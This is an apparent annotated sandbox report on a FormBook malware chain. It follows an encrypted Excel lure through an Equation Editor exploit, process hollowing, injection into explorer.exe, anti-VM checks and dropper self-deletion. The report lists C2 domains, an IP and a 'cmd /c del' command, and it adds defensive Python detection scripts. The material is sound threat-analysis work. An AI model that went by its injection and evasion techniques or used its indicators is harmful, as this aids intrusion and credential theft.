Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FC90 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F80C40 NtGetContextThread
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FC48 NtSetInformationFile
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FC30 NtOpenProcess
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FFFC NtCreateProcessEx
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FF34 NtQueueApcThread
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FEA0 NtReadVirtualMemory
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F7FE24 NtWriteVirtualMemory
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_000981D0 NtCreateFile
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_00098280 NtReadFile
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_00098300 NtClose
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_000983B0 NtAllocateVirtualMemory
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_000981CE NtCreateFile
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_0009827A NtReadFile
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_000983AB NtAllocateVirtualMemory
(The functions in the 0x01F7xxxx/0x01F8xxxx range are hand-rolled Nt* stubs, each paired with LdrInitializeThunk where the sandbox could resolve it, i.e. the payload calls the native API directly instead of through kernel32. NtUnmapViewOfSection, NtWriteVirtualMemory, NtSetContextThread and NtResumeThread together are the hollowing sequence; NtQueueApcThread is the APC-injection primitive; NtCreateSection/NtMapViewOfSection is the section-mapping route into another process. The 0x0009xxxx entries belong to a second image in the same process at base 0x80000, the region the Yara scan below attributes to FormBook.)
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040323C EntryPoint,#17,SetErrorMode,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcmpiA,CreateDirectoryA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,ExitWindowsEx,ExitProcess (the NSIS installer stub's entry point: temp-directory setup, plugin extraction and clean-up)
Source: C:\Users\Public\vbc.exe | Code functions (4_2): 00404853, 00406131, 73001A98
Source: C:\Users\Public\vbc.exe | Code functions (5_2, image at 0x400000): 00401030, 0041C0A9, 0041C1CD, 0041B992, 0041C2A7, 0041A302, 00408C6B, 00408C70, 0041B4B3, 00402D87, 00402D90, 0041BD9E, 00402FB0
Source: C:\Users\Public\vbc.exe | Code functions (5_2, 0x7Axxxx to 0x86xxxx range): 007C905A, 007B3040, 007DD005, 007AE0C6, 007AE2E9, 00851238, 007FA37B, 007B7353, 008563BF, 007B2305, 007D63DB, 007AF3CF, 007ED47D, 007C1489, 007E5485, 007F6540, 007B351F, 007CC5F0, 007FA634, 00852622, 007BE6C1, 007B4680, 0083579A, 007E57C3, 007BC7BC, 007D286D, 007BC85C, 0084F8EE, 0085098E, 007C69FE, 007B29B2, 00835955, 00863A83, 0085CBA4, 0083DBDA, 007D7B00, 007AFBD7, 007BCD5B, 007E0D3B, 0084FDDD, 007CEE4C, 007E2E2F, 007DDF7C, 007C0F3F
Source: C:\Users\Public\vbc.exe | Code functions (5_1, image at 0x400000): 00401030, 0041C0A9, 0041C1CD, 0041C2A7, 0041A302, 0041B4B3
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2, 0x1F8xxxx to 0x204xxxx range): 02031238, 01F8E0C6, 01FA905A, 01F93040, 01FBD005, 01FB63DB, 01F8F3CF, 01FDA37B, 01F97353, 01F92305, 01F8E2E9, 01FAC5F0, 02032622, 01F9351F, 01FA1489, 01FC5485, 01FCD47D, 0201579A, 01FC57C3, 01F9C7BC, 01F9E6C1, 01F94680, 01FA69FE, 01F929B2, 02043A83, 01FB286D, 01F9C85C, 0203CBA4, 0201DBDA, 01F8FBD7, 0202F8EE, 01FB7B00, 02015955, 0203098E, 01F9CD5B, 01FC0D3B, 01FBDF7C, 01FA0F3F, 01FAEE4C, 01FC2E2F, 0202FDDD
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2, image at 0x80000): 0009A302, 00088C6B, 00088C70, 00082D87, 00082D90, 00082FB0
(Every raserver.exe address is a process-5 vbc.exe address rebased by a constant: 007C905A to 01FA905A, 007B3040 to 01F93040, 0041A302 to 0009A302, 00408C6B to 00088C6B. The same two code regions that ran in the hollowed vbc.exe were copied into raserver.exe; nothing was fetched again.)
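The Nt* listing above is the raw evidence behind the "Sample uses process hollowing technique" and "Queues an APC in another process" signatures, but a single NtWriteVirtualMemory proves nothing; it is the combination inside one process image that matters. As an added example (not part of this report and not Joe Sandbox tooling), the Python below reads lines in exactly the report's "Source: ...Code function: ..." format, groups the resolved API names per process, and flags only the API sets that together make up a technique. The input is a subset of lines copied from this report; the technique table and its labels are this example's own.

```python
import re
from collections import defaultdict

# One report line: "Source: <process image>Code function: <pid>_<run>_<addr> <api>,<api>,"
LINE_RE = re.compile(
    r"^Source: (?P<src>.+?)Code function: (?P<fid>\d+_\d+_[0-9A-Fa-f]+)(?P<apis>.*)$"
)

# API sets that only mean something together. The labels are this example's own.
TECHNIQUES = {
    "process hollowing (unmap, write, set context, resume)": {
        "NtUnmapViewOfSection", "NtWriteVirtualMemory",
        "NtSetContextThread", "NtResumeThread",
    },
    "APC injection": {"NtQueueApcThread", "NtWriteVirtualMemory"},
    "section mapping into another process": {"NtCreateSection", "NtMapViewOfSection"},
    "dynamic API resolution": {"LoadLibraryA", "GetProcAddress"},
}

# Constructed input: a subset of the lines this report lists (verbatim format).
SAMPLE_LINES = r"""
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FC60 NtMapViewOfSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FFB4 NtCreateSection,LdrInitializeThunk,
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F80078 NtResumeThread,
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F81930 NtSetContextThread,
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FC90 NtUnmapViewOfSection,
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FFFC NtCreateProcessEx,
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FF34 NtQueueApcThread,
Source: C:\Windows\SysWOW64\raserver.exeCode function: 7_2_01F7FE24 NtWriteVirtualMemory,
Source: C:\Users\Public\vbc.exeCode function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\Public\vbc.exeCode function: 5_2_00401030
"""


def parse_code_functions(text):
    """Map (process image, "<pid>_<run>") to the set of API names seen in its functions."""
    apis_by_process = defaultdict(set)
    for raw in text.splitlines():
        match = LINE_RE.match(raw.strip())
        if not match:
            continue
        pid_run = "_".join(match.group("fid").split("_")[:2])   # "7_2_01F7FC60" -> "7_2"
        apis = {a.strip() for a in match.group("apis").split(",") if a.strip()}
        apis_by_process[(match.group("src"), pid_run)] |= apis
    return dict(apis_by_process)


def flag_techniques(api_names):
    """Techniques whose complete API set is present, sorted for stable output."""
    return sorted(name for name, needed in TECHNIQUES.items() if needed <= api_names)


def triage(text):
    """Per process: the technique labels its resolved API names justify."""
    return {key: flag_techniques(apis) for key, apis in parse_code_functions(text).items()}


if __name__ == "__main__":
    for (image, pid_run), found in triage(SAMPLE_LINES).items():
        print(f"{pid_run:>4} {image}: {', '.join(found) or 'nothing flagged'}")
```

Run against the full listing, process 7 (raserver.exe) comes back with hollowing, APC injection and section mapping, process 4 (the NSIS stub) only with run-time import resolution, and the address-only lines contribute nothing, which is the point: the sandbox's per-function rows become per-process technique claims you can defend.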
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false (expected for an encrypted container: the static parser sees only the EncryptionInfo/EncryptedPackage streams, not the workbook itself)
Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01FD373B appears 238 times
Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F8DF5C appears 107 times
Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01FD3F92 appears 108 times
Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01FFF970 appears 81 times
Source: C:\Windows\SysWOW64\raserver.exe | Code function: String function: 01F8E2A8 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007F3F92 appears 108 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 00419F80 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007ADF5C appears 118 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007F373B appears 238 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0081F970 appears 81 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 0041A0B0 appears 38 times
Source: C:\Users\Public\vbc.exe | Code function: String function: 007AE2A8 appears 38 times
(The call counts line up pairwise between the two processes: 007F373B/01FD373B (238), 007F3F92/01FD3F92 (108), 0081F970/01FFF970 (81), 007AE2A8/01F8E2A8 (38). Same code, same cross-reference counts, different base address.)
Yara matches. Each source listed below matched both of the following rules:
Formbook_1: author Felix Bilstein (yara-signator at cocacoding dot com), date 2018-11-23, autogenerated by yara-signator 0.1a, version 1, malpedia_version 20180607, malpedia_reference https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type Formbook Payload, malpedia_license CC BY-NC-SA 4.0, malpedia_sharing TLP:WHITE
Formbook: author JPCERT/CC Incident Response Group, description "detect Formbook in memory", rule_usage memory scan, reference internal research

Sources of type MEMORY:
00000007.00000002.2347711693.0000000000080000.00000040.00000001.sdmp
00000004.00000002.2142670660.0000000009760000.00000004.00000001.sdmp
00000005.00000002.2193671756.0000000000400000.00000040.00000001.sdmp
00000005.00000001.2139121707.0000000000400000.00000040.00020000.sdmp
00000007.00000002.2347827615.0000000000220000.00000040.00000001.sdmp
00000005.00000002.2193556104.0000000000290000.00000040.00000001.sdmp
00000007.00000002.2347889213.0000000000430000.00000004.00000001.sdmp
00000005.00000002.2193865699.0000000000710000.00000040.00000001.sdmp
00000006.00000000.2169573435.000000000293F000.00000040.00000001.sdmp

Sources of type UNPACKEDPE:
5.2.vbc.exe.400000.1.unpack
4.2.vbc.exe.9760000.7.unpack
5.1.vbc.exe.400000.0.raw.unpack
4.2.vbc.exe.9760000.7.raw.unpack
5.1.vbc.exe.400000.0.unpack
5.2.vbc.exe.400000.1.raw.unpack

(Two independently written rules agree on every stage: the decrypted payload in the NSIS process (4, heap region at 0x9760000), the hollowed child (5, at 0x400000 in both the first and second dump), process 6 and raserver.exe (7, at 0x80000 and 0x220000). The payload is never on disk in this form, which is why the memory and unpacked-PE sources, not the dropped files, carry the family attribution.)
Source: classification engine | Classification label: mal100.troj.expl.evad.winXLSX@9/21@5/4
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00404356 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA (NSIS's standard directory-page code, present in the stub even though this installer runs silently)
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00402020 CoCreateInstance,MultiByteToWideChar
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\Desktop\~$Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx (Excel's owner lock file)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCFFB.tmp
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
Source: C:\Users\Public\vbc.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers (the Software Restriction Policy lookup CreateProcess performs; routine, not evasion)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts (twice; the Equation Editor has no reason to resolve names, so a hosts read here is the first step of the download that produces loader1[1].exe listed under Data Obfuscation)
Source: C:\Windows\explorer.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | Virustotal: Detection: 25%
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | ReversingLabs: Detection: 21%
Process chain (the original lists each "Process created" event twice; process numbers are the ones used in the code-function and memory-dump identifiers above):
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding (the Equation Editor started out-of-process through COM for the embedded object; this is the CVE-2017-11882 / CVE-2018-0802 path the Sigma signatures name)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' (process 4, the NSIS dropper, launched from a world-writable directory)
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe' (process 5, a second copy of itself that is hollowed and refilled with the FormBook image at 0x400000)
Source: C:\Windows\explorer.exe | Process created: C:\Windows\SysWOW64\raserver.exe C:\Windows\SysWOW64\raserver.exe (explorer.exe is not created anywhere in this chain and yet acts here, i.e. it was reached by injection; it starts raserver.exe (process 7) with no arguments)
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe' (the dropper is deleted once the payload lives inside system processes)
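The chain above is exactly what the "Droppers Exploiting CVE-2017-11882" and "Execution from Suspicious Folder" Sigma rules key on, and it is cheap to reproduce from endpoint telemetry. As an added example (not part of this report), the Python below runs that logic over constructed process-creation events expressed in Sysmon Event ID 1 field names (Image, ParentImage, CommandLine) built from the chain above. The report gives no parent for EXCEL.EXE and EQNEDT32.EXE, so those are left as None; the rule names, the "explorer.exe starts an argument-less SysWOW64 binary" heuristic and the benign notepad.exe control event are assumptions of this example.

```python
import ntpath
from collections import Counter

# Constructed process-creation events (Sysmon Event ID 1 field names), built
# from the chain in the report. The final notepad.exe event is a benign
# control that must not fire.
EVENTS = [
    {"Image": r"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE",
     "ParentImage": None,
     "CommandLine": r"'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding"},
    {"Image": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "ParentImage": None,
     "CommandLine": r"'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding"},
    {"Image": r"C:\Users\Public\vbc.exe",
     "ParentImage": r"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE",
     "CommandLine": r"'C:\Users\Public\vbc.exe'"},
    {"Image": r"C:\Users\Public\vbc.exe",
     "ParentImage": r"C:\Users\Public\vbc.exe",
     "CommandLine": r"'C:\Users\Public\vbc.exe'"},
    {"Image": r"C:\Windows\SysWOW64\raserver.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"C:\Windows\SysWOW64\raserver.exe"},
    {"Image": r"C:\Windows\SysWOW64\cmd.exe",
     "ParentImage": r"C:\Windows\SysWOW64\raserver.exe",
     "CommandLine": r"/c del 'C:\Users\Public\vbc.exe'"},
    {"Image": r"C:\Windows\System32\notepad.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"notepad.exe"},
]

PUBLIC_DIR = "c:\\users\\public\\"
SYSWOW64_DIR = "c:\\windows\\syswow64\\"


def _base(path):
    """Lower-cased file name of a Windows path (ntpath splits on backslashes on any host)."""
    return ntpath.basename(path or "").lower()


def _has_arguments(command_line, image):
    """True when the command line is more than the (possibly quoted) image path."""
    return command_line.strip().strip("'\"").lower() != image.lower()


def detect(events):
    """Return (rule, subject) pairs for every event that matches a rule."""
    hits = []
    for ev in events:
        image, parent = ev["Image"], ev.get("ParentImage")
        cmd, low = ev.get("CommandLine", ""), ev["Image"].lower()
        # Sigma "Droppers Exploiting CVE-2017-11882": the Equation Editor never legitimately spawns children.
        if _base(parent) == "eqnedt32.exe":
            hits.append(("equation_editor_child_process", image))
        # Sigma "Execution from Suspicious Folder": C:\Users\Public is writable by every user.
        if low.startswith(PUBLIC_DIR) and low.endswith(".exe"):
            hits.append(("execution_from_users_public", image))
        # Assumption of this example: explorer.exe starting a SysWOW64 system binary with no
        # arguments (raserver.exe here) is an injection target being launched, not a user action.
        if _base(parent) == "explorer.exe" and low.startswith(SYSWOW64_DIR) and not _has_arguments(cmd, image):
            hits.append(("explorer_spawns_argless_syswow64_binary", image))
        # The dropper removing itself: cmd.exe /c del <path>; reported against the parent that ordered it.
        if _base(image) == "cmd.exe" and "/c del" in cmd.lower():
            hits.append(("self_delete_via_cmd", parent))
    return hits


def rule_counts(hits):
    """How often each rule fired, for a quick roll-up."""
    return dict(Counter(rule for rule, _ in hits))


if __name__ == "__main__":
    for rule, subject in detect(EVENTS):
        print(f"{rule:40} {subject}")
```

On the events above this yields five hits and leaves the notepad.exe control alone. In production the first rule alone is worth an alert: after the Equation Editor patches, there is no benign reason for EQNEDT32.EXE to have a child process at all.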
Source: C:\Users\Public\vbc.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | Static file information: File size 1331416 > 1048576
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: RAServer.pdb | source: vbc.exe, 00000005.00000002.2193897914.0000000000740000.00000040.00000001.sdmp (listed twice in the original, once with a stray "^"; raserver.exe's PDB path sitting in process 5's memory at 0x740000 indicates vbc.exe had already mapped the raserver.exe image, i.e. chosen it as the host, before explorer.exe launched it)
Source: Binary string: wntdll.pdb | source: vbc.exe, raserver.exe (the WOW64 32-bit ntdll; present in any 32-bit process on 64-bit Windows)
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | Initial sample: OLE indicators vbamacros = False
Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsx | Initial sample: OLE indicators encrypted = True (the workbook is an encrypted OOXML container. Excel silently tries its built-in default password, VelvetSweatshop, when opening such a file, so the user sees no prompt while any scanner that does not attempt that password sees only ciphertext. No macros are involved; the payload is the embedded Equation Editor object, which is why the chain starts in EQNEDT32.EXE rather than in a VBA project.)

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\Public\vbc.exe | Unpacked PE file: 5.2.vbc.exe.400000.1.unpack .text:ER;.rdata:R;.data:W;.ndata:W;.rsrc:R; vs .text:ER;
(The on-disk vbc.exe has an .ndata section, the marker of an NSIS installer, which fits the nsoA180.tmp\System.dll plugin it drops below. The image found at 0x400000 in process 5 has only an executable .text section: the NSIS stub was unmapped and replaced in place by the FormBook payload, which is what the Yara matches on 5.2.vbc.exe.400000.1.unpack above record.)
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress (run-time import resolution)
Source: C:\Users\Public\vbc.exe | Code function: 4_2_73002F60 push eax; ret
Source: C:\Users\Public\vbc.exe | Code functions (5_2): 0041624A pushad ; ret / 0041B3C5 push eax; ret / 0041B47C push eax; ret / 0041B412 push eax; ret / 0041B41B push eax; ret / 0040B7D2 push ebx; retf / 007ADFA1 push ecx; ret
Source: C:\Users\Public\vbc.exe | Code functions (5_1): 0041624A pushad ; ret / 0041B3C5 push eax; ret / 0041B47C push eax; ret / 0041B412 push eax; ret / 0041B41B push eax; ret
Source: C:\Windows\SysWOW64\raserver.exe | Code functions (7_2): 01F8DFA1 push ecx; ret / 0009624A pushad ; ret / 0009B3C5 push eax; ret / 0009B41B push eax; ret / 0009B412 push eax; ret / 0009B47C push eax; ret / 0008B7D2 push ebx; retf
(A push followed by ret is an indirect jump whose target a linear disassembler cannot see. The raserver.exe addresses are the process-5 addresses rebased: 0041624A to 0009624A and 0040B7D2 to 0008B7D2 differ by exactly 0x380000, and 007ADFA1 maps to 01F8DFA1, so raserver.exe is running the same two code regions that process 5 ran.)
Source: C:\Users\Public\vbc.exe | File created: C:\Users\user\AppData\Local\Temp\nsoA180.tmp\System.dll (dropped file: the NSIS System plugin, extracted to the installer's temp directory)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file; the original lists this write twice)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loader1[1].exe (dropped file: the download, cached under Temporary Internet Files, which means the shellcode fetched it through the WinINet/urlmon stack rather than raw sockets, then copied it out as vbc.exe)

Boot Survival:

Drops PE files to the user root directory
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\Public\vbc.exe (dropped file)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Process information set: NOOPENFILEERRORBOX (10 times)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process information set: NOOPENFILEERRORBOX (7 times)
Source: C:\Users\Public\vbc.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\raserver.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX (SetErrorMode with the crash dialog suppressed as well: if the injected code faults, the user sees nothing)
          Source: Agency Appointment VSL Tbn-Port-Appointment Letter- 2100133.xlsxStream path 'EncryptedPackage' entropy: 7.99982695424 (max. 8.0)

Malware Analysis System Evasion:

Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 00000000004085F4 second address: 00000000004085FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe | RDTSC instruction interceptor: First address: 000000000040898E second address: 0000000000408994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 00000000000885F4 second address: 00000000000885FA instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\raserver.exe | RDTSC instruction interceptor: First address: 000000000008898E second address: 0000000000088994 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088C0 rdtsc
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032 | Thread sleep time: -240000s >= -30000s
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 3032 | Thread sleep time: -60000s >= -30000s
Source: C:\Windows\SysWOW64\raserver.exe TID: 2248 | Thread sleep time: -32000s >= -30000s
Source: C:\Windows\explorer.exe | Last function: Thread delayed
Source: C:\Windows\SysWOW64\raserver.exe | Last function: Thread delayed
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405E61 FindFirstFileA,FindClose,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040548B CloseHandle,DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_0040263E FindFirstFileA,
Source: explorer.exe, 00000006.00000000.2168055639.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000006.00000000.2154423611.0000000004263000.00000004.00000001.sdmp | Binary or memory string: \\?\ide#cdromnecvmwar_vmware_sata_cd01_______________1.00____#6&373888b8&0&1.0.0#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}ies
Source: vbc.exe, 00000004.00000002.2141137463.0000000000544000.00000004.00000020.sdmp | Binary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
Source: explorer.exe, 00000006.00000000.2145052068.0000000000231000.00000004.00000020.sdmp | Binary or memory string: IDE\CDROMNECVMWAR_VMWARE_SATA_CD01_______________1.00____\6&373888B8&0&1.0.0&E}
Source: C:\Users\Public\vbc.exe | Process information queried: ProcessInformation
Source: C:\Users\Public\vbc.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\raserver.exe | Process queried: DebugPort
Source: C:\Users\Public\vbc.exe | Code function: 5_2_004088C0 rdtsc
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00409B30 LdrLoadDll,
Source: C:\Users\Public\vbc.exe | Code function: 4_2_00405E88 GetModuleHandleA,LoadLibraryA,GetProcAddress,
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007900EA mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 5_2_00790080 mov ecx, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Code function: 5_2_007B26F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\raserver.exe | Code function: 7_2_01F926F8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
Source: C:\Windows\SysWOW64\raserver.exe | Process token adjusted: Debug

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe | Domain query: www.spinecompanion.com
Source: C:\Windows\explorer.exe | Domain query: www.reufhroir.com
Source: C:\Windows\explorer.exe | Domain query: www.pholbhf.icu
Source: C:\Windows\explorer.exe | Domain query: www.dr-farshidtajik.com
Source: C:\Windows\explorer.exe | Network Connect: 217.70.184.50 80
Maps a DLL or memory area into another process
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Users\Public\vbc.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\raserver.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\raserver.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
Source: C:\Windows\SysWOW64\raserver.exe | Thread register set: target process: 1388
Queues an APC in another process (thread injection)
Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
Sample uses process hollowing technique
Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\raserver.exe base address: B40000
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
Source: C:\Windows\SysWOW64\raserver.exe | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000006.00000000.2168055639.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
Source: explorer.exe, 00000006.00000000.2145193099.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
